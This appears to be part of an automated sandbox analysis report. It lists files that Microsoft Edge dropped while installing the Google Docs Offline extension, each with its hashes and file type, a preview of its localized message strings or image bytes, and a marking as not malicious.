Encrypted:	true
SSDEEP:	49152:7yut/qE9qFGMVMAplQCb0Cfa/3/1n6oVQ0hLF9CODONvIUbbYEohU:eut/GGgMGlLnS3zVQWLzCDRIE8U
MD5:	27B8E2C0D8EF8D05AF21AC0E6C6733A4
SHA1:	7609DBFBB8EA913DAC51810C9AA53C563C1F5C3B
SHA-256:	EEDAA6A4B8B77B350B58F467BA12FB8AAC5C9E69F6ED3778970C0422CE92F4AD
SHA-512:	FB3E4188DF048A616543BA79CB917FED450F45EF5C1E990D9AD2BE2CEB733BC19FB9848DD95620B36F8DC5048BAB7855ECAAE03CD222F31678C59E52716D6462
Malicious:	false
Preview:	.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\3d1f5e7b-85ca-4db9-9bd6-852577826423.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
